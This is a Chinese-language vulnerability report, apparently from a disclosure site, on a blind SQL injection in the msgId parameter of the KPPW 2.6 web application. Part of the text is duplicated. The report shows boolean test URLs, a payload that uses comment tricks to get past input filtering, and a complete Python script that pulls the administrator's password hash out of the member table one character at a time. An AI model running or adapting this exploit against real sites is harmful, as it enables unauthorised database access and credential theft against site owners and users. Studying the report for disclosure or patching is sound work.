### 简要描述: KPPW2620150327UTF-8.zip 3月27 最新版本 ### 详细说明: Url1: http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1 [<img src="https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png) Url2: http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1 [<img src="https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png) Url3: http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2 [<img src="https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png" alt="图片3.png" width="600"...
### 简要描述: KPPW2620150327UTF-8.zip 3月27 最新版本 ### 详细说明: Url1: http://localhost/KPPW/index.php?do=user&view=message&op=detail&msgId=74&type=trends&intPage=1 [<img src="https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2723220621c436854a2914d1f1bdfdfb79bed2b3.png) Url2: http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D1 [<img src="https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/2723222698ece75cf6b1e20b8558e5b3daaefa8d.png) Url3: http://localhost/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%261%3D2 [<img src="https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/272322489410ffb629cb810421479dddd42b51fe.png) ### 漏洞证明: 由此可见 可以注入。 不过也有一些过滤。 不过可以绕过。 &&(select/**/CHAR(48))=SUBSTR((SELECT/**/password/**/from/**/keke_witkey_member/**/WHERE/**/uid=1),1,1) 附上验证脚本 ``` #coding:utf-8 import httplib def get(i1,i2): page="" rHtml=httplib.HTTPConnection("localhost",80,False) url="/KPPW/index.php?do=user&view=message&op=detail&type=trends&intPage=1&msgId=74%26%26(select%2f**%2fCHAR("+i1+"))%3dSUBSTR((SELECT%2f**%2fpassword%2f**%2ffrom%2f**%2fkeke_witkey_member%2f**%2fWHERE%2f**%2fuid%3d1)%2c"+i2+",1%29" #print url rHtml.request("GET",url,headers={"User-Agent":"Firefox/22.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Cookie":"PHPSESSID=*","Connection":"keep-alive"})#session 需要自己设置 page=rHtml.getresponse(False) return page.read().count('msgId=73')#关键字 大家可以自己设置 mm=[] for i in range(1,33): for ii in range(48,123): if(get(str(ii),str(i))!=0): mm.append(chr(ii)) print "".join(mm) break ``` 效果 [<img src="https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/272325156ad62e1f592a32c84a7611cfd24d0cb3.png)
